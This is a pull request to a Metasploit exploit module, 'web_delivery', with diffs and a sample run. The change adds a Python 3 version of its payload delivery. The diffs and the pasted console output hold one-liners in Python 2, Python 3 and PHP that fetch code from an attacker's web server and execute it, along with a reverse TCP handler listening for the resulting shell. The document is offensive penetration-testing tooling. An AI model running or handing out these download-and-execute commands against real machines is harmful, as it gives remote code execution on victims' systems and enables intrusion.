### PR TITLE
Python 3 support for web_delivery.rb

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -86,7 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'PHP'
       print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
     when 'Python'
+	  print_line("python 2:")
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+      print_line("Python 3:")
+      print_line("python3 -c \"import urllib.request; r = urllib.request.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'PHP'
       print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
     when 'Python'
-	  print_line("python 2:")
+      print_line("python 2:")
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
       print_line("Python 3:")
       print_line("python3 -c \"import urllib.request; r = urllib.request.urlopen('#{url}'); exec(r.read());\"")


### PR DESCRIPTION
Output when running the module:

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.178.20:4444 
[*] Using URL: http://0.0.0.0:8080/r1Ta84f

[*] Local IP: http://192.168.178.20:8080/r1Ta84f
[*] Server started.
[*] Run the following command on the target machine:
python 2:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.178.20:8080/r1Ta84f'); exec(r.read());"
Python 3:
python3 -c "import urllib.request; r = urllib.request.urlopen('http://192.168.178.20:8080/r1Ta84f'); exec(r.read());"
